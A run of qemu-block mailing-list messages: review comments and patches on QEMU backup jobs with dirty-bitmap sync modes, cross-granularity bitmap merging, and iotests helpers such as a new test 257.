Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread Markus Armbruster
John Snow  writes:

> On 7/5/19 10:14 AM, Markus Armbruster wrote:
>> John Snow  writes:
>> 
>>> drive-backup and blockdev-backup have an awful lot of things in common.
>>> Let's deduplicate them.
>>>
>>> I don't deduplicate 'target', because the semantics actually did change
>>> between each structure. Leave that one alone so it can be documented
>>> separately.
>>>
>>> Signed-off-by: John Snow 
>>> ---
>>>  qapi/block-core.json | 103 ++-
>>>  1 file changed, 33 insertions(+), 70 deletions(-)
>>>
>>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>>> index 0d43d4f37c..7b23efcf13 100644
>>> --- a/qapi/block-core.json
>>> +++ b/qapi/block-core.json
>>> @@ -1315,32 +1315,23 @@
>>>'data': { 'node': 'str', 'overlay': 'str' } }
>>>  
>>>  ##
>>> -# @DriveBackup:
>>> +# @BackupCommon:
>>>  #
>>>  # @job-id: identifier for the newly-created block job. If
>>>  #  omitted, the device name will be used. (Since 2.7)
>>>  #
>>>  # @device: the device name or node-name of a root node which should be 
>>> copied.
>>>  #
>>> -# @target: the target of the new image. If the file exists, or if it
>>> -#  is a device, the existing file/device will be used as the new
>>> -#  destination.  If it does not exist, a new file will be created.
>>> -#
>>> -# @format: the format of the new destination, default is to
>>> -#  probe if @mode is 'existing', else the format of the source
>>> -#
>>>  # @sync: what parts of the disk image should be copied to the destination
>>>  #(all the disk, only the sectors allocated in the topmost image, 
>>> from a
>>>  #dirty bitmap, or only new I/O).
>> 
>> This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
>> Is this a doc fix?
>
> Yes.

Worth mentioning in the commit message?

>>>  #
>>> -# @mode: whether and how QEMU should create a new image, default is
>>> -#'absolute-paths'.
>>> -#
>>> -# @speed: the maximum speed, in bytes per second
>>> +# @speed: the maximum speed, in bytes per second. The default is 0,
>>> +# for unlimited.
>> 
>> This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
>> unlimited."  Is this a doc fix?
>
> Yes.

Worth mentioning in the commit message?

[...]



Re: [Qemu-block] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Eric Blake
On 7/5/19 4:31 AM, Max Reitz wrote:
> On 04.07.19 00:47, Eric Blake wrote:
>> Although you generally won't use encryption with a Unix socket (after
>> all, everything is local, so why waste the CPU power), there are
>> situations in testsuites where Unix sockets are much nicer than TCP
>> sockets.  Since nbdkit allows encryption over both types of sockets,
>> it makes sense for qemu-nbd to do likewise.
> 
> Hmm.  The code is simple enough, so I don’t see a good reason not to.
> 

> Um, also, a perhaps stupid question: Why is there no passing test for
> client authorization?
> 

Not a stupid question. It's copy-and-paste from the existing test over
TCP, which Dan added in b25e12daf without any additional successful test.
I guess the earlier tests in the file are the success cases, and this
just checks that authz restrictions cover the expected failure case of
something that would succeed without authz? Or maybe that commit really
is incomplete?

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org





[Qemu-block] [PATCH v3 17/18] iotests: add test 257 for bitmap-mode backups

2019-07-05 Thread John Snow
Signed-off-by: John Snow 
---
 tests/qemu-iotests/257 |  409 +++
 tests/qemu-iotests/257.out | 2199 
 tests/qemu-iotests/group   |1 +
 3 files changed, 2609 insertions(+)
 create mode 100755 tests/qemu-iotests/257
 create mode 100644 tests/qemu-iotests/257.out

diff --git a/tests/qemu-iotests/257 b/tests/qemu-iotests/257
new file mode 100755
index 00..fd3b3328d8
--- /dev/null
+++ b/tests/qemu-iotests/257
@@ -0,0 +1,409 @@
+#!/usr/bin/env python
+#
+# Test bitmap-sync backups (incremental, differential, and partials)
+#
+# Copyright (c) 2019 John Snow for Red Hat, Inc.
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see .
+#
+# owner=js...@redhat.com
+
+from collections import namedtuple
+import math
+import os
+
+import iotests
+from iotests import log, qemu_img
+
+SIZE = 64 * 1024 * 1024
+GRANULARITY = 64 * 1024
+
+Pattern = namedtuple('Pattern', ['byte', 'offset', 'size'])
+def mkpattern(byte, offset, size=GRANULARITY):
+    """Constructor for Pattern() with default size"""
+    return Pattern(byte, offset, size)
+
+class PatternGroup:
+    """Grouping of Pattern objects. Initialize with an iterable of Patterns."""
+    def __init__(self, patterns):
+        self.patterns = patterns
+
+    def bits(self, granularity):
+        """Calculate the unique bits dirtied by this pattern grouping"""
+        res = set()
+        for pattern in self.patterns:
+            lower = math.floor(pattern.offset / granularity)
+            upper = math.floor((pattern.offset + pattern.size - 1) /
+                               granularity)
+            res = res | set(range(lower, upper + 1))
+        return res
+
+GROUPS = [
+PatternGroup([
+# Batch 0: 4 clusters
+mkpattern('0x49', 0x000),
+mkpattern('0x6c', 0x010),   # 1M
+mkpattern('0x6f', 0x200),   # 32M
+mkpattern('0x76', 0x3ff)]), # 64M - 64K
+PatternGroup([
+# Batch 1: 6 clusters (3 new)
+mkpattern('0x65', 0x000),   # Full overwrite
+mkpattern('0x77', 0x00f8000),   # Partial-left (1M-32K)
+mkpattern('0x72', 0x2008000),   # Partial-right (32M+32K)
+mkpattern('0x69', 0x3fe)]), # Adjacent-left (64M - 128K)
+PatternGroup([
+# Batch 2: 7 clusters (3 new)
+mkpattern('0x74', 0x001),   # Adjacent-right
+mkpattern('0x69', 0x00e8000),   # Partial-left  (1M-96K)
+mkpattern('0x6e', 0x2018000),   # Partial-right (32M+96K)
+mkpattern('0x67', 0x3fe,
+  2*GRANULARITY)]), # Overwrite [(64M-128K)-64M)
+PatternGroup([
+# Batch 3: 8 clusters (5 new)
+# Carefully chosen such that nothing re-dirties the one cluster
+# that copies out successfully before failure in Group #1.
+mkpattern('0xaa', 0x001,
+  3*GRANULARITY),   # Overwrite and 2x Adjacent-right
+mkpattern('0xbb', 0x00d8000),   # Partial-left (1M-160K)
+mkpattern('0xcc', 0x2028000),   # Partial-right (32M+160K)
+mkpattern('0xdd', 0x3fc)]), # New; leaving a gap to the right
+]
+
+class Drive:
+"""Represents, vaguely, a drive attached to a VM.
+Includes format, graph, and device information."""
+
+def __init__(self, path, vm=None):
+self.path = path
+self.vm = vm
+self.fmt = None
+self.size = None
+self.node = None
+self.device = None
+
+@property
+def name(self):
+return self.node or self.device
+
+def img_create(self, fmt, size):
+self.fmt = fmt
+self.size = size
+iotests.qemu_img_create('-f', self.fmt, self.path, str(self.size))
+
+def create_target(self, name, fmt, size):
+basename = os.path.basename(self.path)
+file_node_name = "file_{}".format(basename)
+vm = self.vm
+
+log(vm.command('blockdev-create', job_id='bdc-file-job',
+   options={
+   'driver': 'file',
+   'filename': self.path,
+   'size': 0,
+   }))
+vm.run_job('bdc-file-job')
+log(vm.command('blockdev-add', driver='file',
+   node_name=file_node_name, filename=self.path))
+
+log(vm.command('blockdev-create', job_id='bdc-fmt-job',
+   options={
+   
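For reference, the bit arithmetic done by bits() above, as a standalone
sketch (the offsets are reconstructed from the batch-0 comments, so they are
illustrative rather than copied verbatim from the test):

    GRANULARITY = 64 * 1024   # 64K clusters, matching the test above

    def dirty_bits(writes, granularity=GRANULARITY):
        """Return the set of bitmap bit indices dirtied by (offset, size) writes."""
        bits = set()
        for offset, size in writes:
            lower = offset // granularity
            upper = (offset + size - 1) // granularity
            bits |= set(range(lower, upper + 1))
        return bits

    # Batch 0: four 64K writes at 0, 1M, 32M and 64M-64K
    batch0 = [(0, GRANULARITY),
              (1 * 1024 * 1024, GRANULARITY),
              (32 * 1024 * 1024, GRANULARITY),
              (64 * 1024 * 1024 - GRANULARITY, GRANULARITY)]
    print(sorted(dirty_bits(batch0)))   # [0, 16, 512, 1023]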

[Qemu-block] [PATCH v3 18/18] block/backup: loosen restriction on readonly bitmaps

2019-07-05 Thread John Snow
With the "never" sync policy, we actually can utilize readonly bitmaps
now. Loosen the check at the QMP level, and tighten it based on
provided arguments down at the job creation level instead.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 block/backup.c | 6 ++
 blockdev.c | 2 +-
 2 files changed, 7 insertions(+), 1 deletion(-)

diff --git a/block/backup.c b/block/backup.c
index b25e6179cf..a59962cea8 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -607,6 +607,12 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 return NULL;
 }
 
+/* If we need to write to this bitmap, check that we can: */
+if (bitmap_mode != BITMAP_SYNC_MODE_NEVER &&
+bdrv_dirty_bitmap_check(sync_bitmap, BDRV_BITMAP_DEFAULT, errp)) {
+return NULL;
+}
+
 /* Create a new bitmap, and freeze/disable this one. */
 if (bdrv_dirty_bitmap_create_successor(bs, sync_bitmap, errp) < 0) {
 return NULL;
diff --git a/blockdev.c b/blockdev.c
index 5dfaa976c9..3e30bc2ca7 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3489,7 +3489,7 @@ static BlockJob *do_backup_common(BackupCommon *backup,
"when providing a bitmap");
 return NULL;
 }
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
+if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_ALLOW_RO, errp)) {
 return NULL;
 }
 }
-- 
2.21.0
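A rough pure-Python model of the two-level check described above (the flag
names in the comments refer to the real QEMU constants, but the model itself
is only illustrative): the QMP layer only requires that the bitmap is usable
read-only, while job creation additionally requires it to be writable unless
the sync policy is 'never'.

    def qmp_level_check(bitmap):
        # like BDRV_BITMAP_ALLOW_RO: busy/inconsistent bitmaps fail,
        # read-only bitmaps are allowed through
        return not (bitmap['busy'] or bitmap['inconsistent'])

    def job_level_check(bitmap, bitmap_mode):
        # like BDRV_BITMAP_DEFAULT: additionally reject read-only bitmaps,
        # but only when the job would actually modify them
        if bitmap_mode != 'never' and bitmap['readonly']:
            return False
        return qmp_level_check(bitmap)

    bmap = {'busy': False, 'inconsistent': False, 'readonly': True}
    assert qmp_level_check(bmap)                    # accepted at the QMP level
    assert job_level_check(bmap, 'never')           # ok: bitmap is never written
    assert not job_level_check(bmap, 'on-success')  # rejected: would need clearing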




[Qemu-block] [PATCH v3 16/18] iotests: Add virtio-scsi device helper

2019-07-05 Thread John Snow
Selecting the right virtio-scsi device variant comes up often enough to
warrant a helper.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/040| 6 +-
 tests/qemu-iotests/093| 6 ++
 tests/qemu-iotests/139| 7 ++-
 tests/qemu-iotests/238| 5 +
 tests/qemu-iotests/iotests.py | 4 
 5 files changed, 10 insertions(+), 18 deletions(-)

diff --git a/tests/qemu-iotests/040 b/tests/qemu-iotests/040
index b81133a474..657b37103c 100755
--- a/tests/qemu-iotests/040
+++ b/tests/qemu-iotests/040
@@ -85,11 +85,7 @@ class TestSingleDrive(ImageCommitTestCase):
 qemu_io('-f', 'raw', '-c', 'write -P 0xab 0 524288', backing_img)
 qemu_io('-f', iotests.imgfmt, '-c', 'write -P 0xef 524288 524288', 
mid_img)
 self.vm = iotests.VM().add_drive(test_img, 
"node-name=top,backing.node-name=mid,backing.backing.node-name=base", 
interface="none")
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw")
-else:
-self.vm.add_device("virtio-scsi-pci")
-
+self.vm.add_device(iotests.get_virtio_scsi_device())
 self.vm.add_device("scsi-hd,id=scsi0,drive=drive0")
 self.vm.launch()
 
diff --git a/tests/qemu-iotests/093 b/tests/qemu-iotests/093
index d88fbc182e..46153220f8 100755
--- a/tests/qemu-iotests/093
+++ b/tests/qemu-iotests/093
@@ -366,10 +366,8 @@ class ThrottleTestGroupNames(iotests.QMPTestCase):
 class ThrottleTestRemovableMedia(iotests.QMPTestCase):
 def setUp(self):
 self.vm = iotests.VM()
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw,id=virtio-scsi")
-else:
-self.vm.add_device("virtio-scsi-pci,id=virtio-scsi")
+self.vm.add_device("{},id=virtio-scsi".format(
+iotests.get_virtio_scsi_device()))
 self.vm.launch()
 
 def tearDown(self):
diff --git a/tests/qemu-iotests/139 b/tests/qemu-iotests/139
index 933b45121a..2176ea51ba 100755
--- a/tests/qemu-iotests/139
+++ b/tests/qemu-iotests/139
@@ -35,11 +35,8 @@ class TestBlockdevDel(iotests.QMPTestCase):
 def setUp(self):
 iotests.qemu_img('create', '-f', iotests.imgfmt, base_img, '1M')
 self.vm = iotests.VM()
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw,id=virtio-scsi")
-else:
-self.vm.add_device("virtio-scsi-pci,id=virtio-scsi")
-
+self.vm.add_device("{},id=virtio-scsi".format(
+iotests.get_virtio_scsi_device()))
 self.vm.launch()
 
 def tearDown(self):
diff --git a/tests/qemu-iotests/238 b/tests/qemu-iotests/238
index 1c0a46fa90..387a77b2cd 100755
--- a/tests/qemu-iotests/238
+++ b/tests/qemu-iotests/238
@@ -23,10 +23,7 @@ import os
 import iotests
 from iotests import log
 
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-virtio_scsi_device = 'virtio-scsi-ccw'
-else:
-virtio_scsi_device = 'virtio-scsi-pci'
+virtio_scsi_device = iotests.get_virtio_scsi_device()
 
 vm = iotests.VM()
 vm.launch()
diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index 6135c9663d..8ae7bc353e 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -164,6 +164,10 @@ def qemu_io_silent(*args):
  (-exitcode, ' '.join(args)))
 return exitcode
 
+def get_virtio_scsi_device():
+    if qemu_default_machine == 's390-ccw-virtio':
+        return 'virtio-scsi-ccw'
+    return 'virtio-scsi-pci'
 
 class QemuIoInteractive:
 def __init__(self, *args):
-- 
2.21.0
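Typical use of the new helper, mirroring the call sites converted above
(assumes the usual iotests environment):

    import os
    import iotests

    test_img = os.path.join(iotests.test_dir, 'test.img')
    iotests.qemu_img_create('-f', iotests.imgfmt, test_img, '1M')

    vm = iotests.VM().add_drive(test_img, interface='none')
    vm.add_device(iotests.get_virtio_scsi_device())
    vm.add_device('scsi-hd,id=scsi0,drive=drive0')
    vm.launch()
    vm.shutdown()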




[Qemu-block] [PATCH v3 09/18] block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal

2019-07-05 Thread John Snow
I'm surprised it didn't come up sooner, but sometimes we have a +busy
bitmap as a source. This is dangerous to allow through the QMP API, but
if we are the owner that marked the bitmap busy, it's safe to merge from
it as a read-only source.

It is not safe in the general case to allow users to read from in-use
bitmaps, so create an internal variant that foregoes the safety
checking.

Signed-off-by: John Snow 
---
 block/dirty-bitmap.c  | 50 +++
 include/block/block_int.h |  3 +++
 2 files changed, 48 insertions(+), 5 deletions(-)

diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
index 95a9c2a5d8..c5b66ae9ed 100644
--- a/block/dirty-bitmap.c
+++ b/block/dirty-bitmap.c
@@ -810,6 +810,12 @@ bool bdrv_dirty_bitmap_next_dirty_area(BdrvDirtyBitmap 
*bitmap,
 return hbitmap_next_dirty_area(bitmap->bitmap, offset, bytes);
 }
 
+/**
+ * bdrv_merge_dirty_bitmap: merge src into dest.
+ * Ensures permissions on bitmaps are reasonable; use for public API.
+ *
+ * @backup: If provided, make a copy of dest here prior to merge.
+ */
 void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap *src,
  HBitmap **backup, Error **errp)
 {
@@ -833,6 +839,38 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const 
BdrvDirtyBitmap *src,
 goto out;
 }
 
+ret = bdrv_dirty_bitmap_merge_internal(dest, src, backup, false);
+assert(ret);
+
+out:
+qemu_mutex_unlock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_unlock(src->mutex);
+}
+}
+
+/**
+ * bdrv_dirty_bitmap_merge_internal: merge src into dest.
+ * Does NOT check bitmap permissions; not suitable for use as public API.
+ *
+ * @backup: If provided, make a copy of dest here prior to merge.
+ * @lock: If true, lock and unlock bitmaps on the way in/out.
+ * returns true if the merge succeeded; false if unattempted.
+ */
+bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
+  const BdrvDirtyBitmap *src,
+  HBitmap **backup,
+  bool lock)
+{
+bool ret;
+
+if (lock) {
+qemu_mutex_lock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_lock(src->mutex);
+}
+}
+
 if (backup) {
 *backup = dest->bitmap;
 dest->bitmap = hbitmap_alloc(dest->size, hbitmap_granularity(*backup));
@@ -840,11 +878,13 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const 
BdrvDirtyBitmap *src,
 } else {
 ret = hbitmap_merge(dest->bitmap, src->bitmap, dest->bitmap);
 }
-assert(ret);
 
-out:
-qemu_mutex_unlock(dest->mutex);
-if (src->mutex != dest->mutex) {
-qemu_mutex_unlock(src->mutex);
+if (lock) {
+qemu_mutex_unlock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_unlock(src->mutex);
+}
 }
+
+return ret;
 }
diff --git a/include/block/block_int.h b/include/block/block_int.h
index e1f2aa627e..83ffdf4950 100644
--- a/include/block/block_int.h
+++ b/include/block/block_int.h
@@ -1238,6 +1238,9 @@ void bdrv_set_dirty(BlockDriverState *bs, int64_t offset, 
int64_t bytes);
 
 void bdrv_clear_dirty_bitmap(BdrvDirtyBitmap *bitmap, HBitmap **out);
 void bdrv_restore_dirty_bitmap(BdrvDirtyBitmap *bitmap, HBitmap *backup);
+bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
+  const BdrvDirtyBitmap *src,
+  HBitmap **backup, bool lock);
 
 void bdrv_inc_in_flight(BlockDriverState *bs);
 void bdrv_dec_in_flight(BlockDriverState *bs);
-- 
2.21.0
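A toy model of the public/internal split (plain Python, not the QEMU C API):
the public entry point refuses busy bitmaps outright, while the internal
variant trusts its caller, i.e. the job that marked the bitmap busy, and only
ever reads from the source.

    def merge_public(dest, src):
        if dest['busy'] or src['busy']:
            raise ValueError('bitmap is busy')
        merge_internal(dest, src)

    def merge_internal(dest, src):
        # dest |= src; src is never modified
        dest['bits'] |= src['bits']

    copy_bitmap = {'busy': True,  'bits': {5, 6, 7}}   # owned by the running job
    sync_bitmap = {'busy': False, 'bits': {1, 2}}

    merge_internal(sync_bitmap, copy_bitmap)           # fine: we own copy_bitmap
    assert sync_bitmap['bits'] == {1, 2, 5, 6, 7}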




[Qemu-block] [PATCH v3 08/18] hbitmap: enable merging across granularities

2019-07-05 Thread John Snow
Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 util/hbitmap.c | 36 +++-
 1 file changed, 35 insertions(+), 1 deletion(-)

diff --git a/util/hbitmap.c b/util/hbitmap.c
index 3b6acae42b..306bc4876d 100644
--- a/util/hbitmap.c
+++ b/util/hbitmap.c
@@ -777,7 +777,27 @@ void hbitmap_truncate(HBitmap *hb, uint64_t size)
 
 bool hbitmap_can_merge(const HBitmap *a, const HBitmap *b)
 {
-return (a->size == b->size) && (a->granularity == b->granularity);
+return (a->orig_size == b->orig_size);
+}
+
+/**
+ * hbitmap_sparse_merge: performs dst = dst | src
+ * works with differing granularities.
+ * best used when src is sparsely populated.
+ */
+static void hbitmap_sparse_merge(HBitmap *dst, const HBitmap *src)
+{
+uint64_t offset = 0;
+uint64_t count = src->orig_size;
+
+while (hbitmap_next_dirty_area(src, &offset, &count)) {
+hbitmap_set(dst, offset, count);
+offset += count;
+if (offset >= src->orig_size) {
+break;
+}
+count = src->orig_size - offset;
+}
 }
 
 /**
@@ -808,10 +828,24 @@ bool hbitmap_merge(const HBitmap *a, const HBitmap *b, 
HBitmap *result)
 return true;
 }
 
+if (a->granularity != b->granularity) {
+if ((a != result) && (b != result)) {
+hbitmap_reset_all(result);
+}
+if (a != result) {
+hbitmap_sparse_merge(result, a);
+}
+if (b != result) {
+hbitmap_sparse_merge(result, b);
+}
+return true;
+}
+
 /* This merge is O(size), as BITS_PER_LONG and HBITMAP_LEVELS are constant.
  * It may be possible to improve running times for sparsely populated maps
  * by using hbitmap_iter_next, but this is suboptimal for dense maps.
  */
+assert(a->size == b->size);
 for (i = HBITMAP_LEVELS - 1; i >= 0; i--) {
 for (j = 0; j < a->sizes[i]; j++) {
 result->levels[i][j] = a->levels[i][j] | b->levels[i][j];
-- 
2.21.0
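The idea behind hbitmap_sparse_merge(), modelled in plain Python: treat each
bitmap as a set of dirty bit indices plus a granularity, walk the dirty areas
of the source as byte ranges, and set those ranges in the destination at its
own granularity (illustrative sketch only).

    def dirty_ranges(bitmap):
        """Yield (offset, length) byte ranges for every dirty bit."""
        g = bitmap['granularity']
        for bit in sorted(bitmap['bits']):
            yield bit * g, g

    def set_range(bitmap, offset, length):
        g = bitmap['granularity']
        first = offset // g
        last = (offset + length - 1) // g
        bitmap['bits'].update(range(first, last + 1))

    def merge(dst, src):
        for offset, length in dirty_ranges(src):
            set_range(dst, offset, length)

    a = {'granularity': 65536, 'bits': {2}}     # one dirty 64K cluster at 128K
    b = {'granularity': 4096,  'bits': set()}   # finer-grained, initially clean
    merge(b, a)
    assert b['bits'] == set(range(32, 48))      # 128K..192K at 4K granularity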




[Qemu-block] [PATCH v3 14/18] iotests: teach run_job to cancel pending jobs

2019-07-05 Thread John Snow
run_job can cancel pending jobs to simulate failure. This lets us use
the pending callback to issue test commands while the job is open, but
then still have the job fail in the end.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 22 --
 1 file changed, 20 insertions(+), 2 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index fcad957d63..c544659ecb 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -541,7 +541,22 @@ class VM(qtest.QEMUQtestMachine):
 
 # Returns None on success, and an error string on failure
 def run_job(self, job, auto_finalize=True, auto_dismiss=False,
-pre_finalize=None, wait=60.0):
+pre_finalize=None, cancel=False, wait=60.0):
+"""
+run_job moves a job from creation through to dismissal.
+
+:param job: String. ID of recently-launched job
+:param auto_finalize: Bool. True if the job was launched with
+  auto_finalize. Defaults to True.
+:param auto_dismiss: Bool. True if the job was launched with
+ auto_dismiss=True. Defaults to False.
+:param pre_finalize: Callback. A callable that takes no arguments to be
+ invoked prior to issuing job-finalize, if any.
+:param cancel: Bool. When true, cancels the job after the pre_finalize
+   callback.
+:param wait: Float. Timeout value specifying how long to wait for any
+ event, in seconds. Defaults to 60.0.
+"""
 match_device = {'data': {'device': job}}
 match_id = {'data': {'id': job}}
 events = [
@@ -568,7 +583,10 @@ class VM(qtest.QEMUQtestMachine):
 elif status == 'pending' and not auto_finalize:
 if pre_finalize:
 pre_finalize()
-self.qmp_log('job-finalize', id=job)
+if cancel:
+self.qmp_log('job-cancel', id=job)
+else:
+self.qmp_log('job-finalize', id=job)
 elif status == 'concluded' and not auto_dismiss:
 self.qmp_log('job-dismiss', id=job)
 elif status == 'null':
-- 
2.21.0
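Example use in a test (a sketch: it assumes a launched VM plus 'drive0' and
'backup-target' nodes created by the surrounding test code): start a job with
manual finalization, inspect state while it sits in 'pending', then cancel it
so the failure path is exercised.

    def check_state_while_pending():
        iotests.log(vm.qmp('query-block-jobs'))

    vm.qmp_log('blockdev-backup', job_id='backup0', device='drive0',
               target='backup-target', sync='full', auto_finalize=False)
    vm.run_job('backup0', auto_finalize=False,
               pre_finalize=check_state_while_pending, cancel=True)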




[Qemu-block] [PATCH v3 15/18] iotests: teach FilePath to produce multiple paths

2019-07-05 Thread John Snow
Use "FilePaths" instead of "FilePath" to request multiple files be
cleaned up after we leave that object's scope.

This is not crucial, but it saves a little typing.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 34 --
 1 file changed, 24 insertions(+), 10 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index c544659ecb..6135c9663d 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -358,31 +358,45 @@ class Timeout:
 def timeout(self, signum, frame):
 raise Exception(self.errmsg)
 
+def file_pattern(name):
+return "{0}-{1}".format(os.getpid(), name)
 
-class FilePath(object):
-'''An auto-generated filename that cleans itself up.
+class FilePaths(object):
+"""
+FilePaths is an auto-generated filename that cleans itself up.
 
 Use this context manager to generate filenames and ensure that the file
 gets deleted::
 
-with TestFilePath('test.img') as img_path:
+with FilePaths(['test.img']) as img_path:
 qemu_img('create', img_path, '1G')
 # migration_sock_path is automatically deleted
-'''
-def __init__(self, name):
-filename = '{0}-{1}'.format(os.getpid(), name)
-self.path = os.path.join(test_dir, filename)
+"""
+def __init__(self, names):
+self.paths = []
+for name in names:
+self.paths.append(os.path.join(test_dir, file_pattern(name)))
 
 def __enter__(self):
-return self.path
+return self.paths
 
 def __exit__(self, exc_type, exc_val, exc_tb):
 try:
-os.remove(self.path)
+for path in self.paths:
+os.remove(path)
 except OSError:
 pass
 return False
 
+class FilePath(FilePaths):
+"""
+FilePath is a specialization of FilePaths that takes a single filename.
+"""
+def __init__(self, name):
+super(FilePath, self).__init__([name])
+
+def __enter__(self):
+return self.paths[0]
 
 def file_path_remover():
 for path in reversed(file_path_remover.paths):
@@ -407,7 +421,7 @@ def file_path(*names):
 
 paths = []
 for name in names:
-filename = '{0}-{1}'.format(os.getpid(), name)
+filename = file_pattern(name)
 path = os.path.join(test_dir, filename)
 file_path_remover.paths.append(path)
 paths.append(path)
-- 
2.21.0
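Usage sketch, assuming the usual iotests environment; both files are deleted
when the with-block exits:

    from iotests import FilePaths, qemu_img_create, imgfmt

    with FilePaths(['a.img', 'b.img']) as (img_a, img_b):
        qemu_img_create('-f', imgfmt, img_a, '1M')
        qemu_img_create('-f', imgfmt, img_b, '1M')
    # both paths are removed here, even if the body raised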




[Qemu-block] [PATCH v3 05/18] block/backup: Add mirror sync mode 'bitmap'

2019-07-05 Thread John Snow
We don't need or want a separate sync mode for every small difference in
semantics.  Create a new mode simply named "BITMAP" that is designed to
make use of the new Bitmap Sync Mode field.

Because the only bitmap sync mode is 'on-success', this adds no new
functionality to the backup job (yet). The old incremental backup mode
is maintained as syntactic sugar for sync=bitmap, mode=on-success.

Add all of the plumbing necessary to support this new instruction.

Signed-off-by: John Snow 
---
 block/backup.c| 20 
 block/mirror.c|  6 --
 block/replication.c   |  2 +-
 blockdev.c| 25 +++--
 include/block/block_int.h |  4 +++-
 qapi/block-core.json  | 21 +++--
 6 files changed, 58 insertions(+), 20 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 715e1d3be8..996941fa61 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -38,9 +38,9 @@ typedef struct CowRequest {
 typedef struct BackupBlockJob {
 BlockJob common;
 BlockBackend *target;
-/* bitmap for sync=incremental */
 BdrvDirtyBitmap *sync_bitmap;
 MirrorSyncMode sync_mode;
+BitmapSyncMode bitmap_mode;
 BlockdevOnError on_source_error;
 BlockdevOnError on_target_error;
 CoRwlock flush_rwlock;
@@ -452,7 +452,7 @@ static int coroutine_fn backup_run(Job *job, Error **errp)
 
 job_progress_set_remaining(job, s->len);
 
-if (s->sync_mode == MIRROR_SYNC_MODE_INCREMENTAL) {
+if (s->sync_mode == MIRROR_SYNC_MODE_BITMAP) {
 backup_incremental_init_copy_bitmap(s);
 } else {
 hbitmap_set(s->copy_bitmap, 0, s->len);
@@ -536,6 +536,7 @@ static int64_t 
backup_calculate_cluster_size(BlockDriverState *target,
 BlockJob *backup_job_create(const char *job_id, BlockDriverState *bs,
   BlockDriverState *target, int64_t speed,
   MirrorSyncMode sync_mode, BdrvDirtyBitmap *sync_bitmap,
+  BitmapSyncMode bitmap_mode,
   bool compress,
   BlockdevOnError on_source_error,
   BlockdevOnError on_target_error,
@@ -583,10 +584,13 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 return NULL;
 }
 
-if (sync_mode == MIRROR_SYNC_MODE_INCREMENTAL) {
+/* QMP interface should have handled translating this to bitmap mode */
+assert(sync_mode != MIRROR_SYNC_MODE_INCREMENTAL);
+
+if (sync_mode == MIRROR_SYNC_MODE_BITMAP) {
 if (!sync_bitmap) {
 error_setg(errp, "must provide a valid bitmap name for "
- "\"incremental\" sync mode");
+   "'%s' sync mode", MirrorSyncMode_str(sync_mode));
 return NULL;
 }
 
@@ -596,8 +600,8 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 }
 } else if (sync_bitmap) {
 error_setg(errp,
-   "a sync_bitmap was provided to backup_run, "
-   "but received an incompatible sync_mode (%s)",
+   "a bitmap was given to backup_job_create, "
+   "but it received an incompatible sync_mode (%s)",
MirrorSyncMode_str(sync_mode));
 return NULL;
 }
@@ -639,8 +643,8 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 job->on_source_error = on_source_error;
 job->on_target_error = on_target_error;
 job->sync_mode = sync_mode;
-job->sync_bitmap = sync_mode == MIRROR_SYNC_MODE_INCREMENTAL ?
-   sync_bitmap : NULL;
+job->sync_bitmap = sync_bitmap;
+job->bitmap_mode = bitmap_mode;
 job->compress = compress;
 
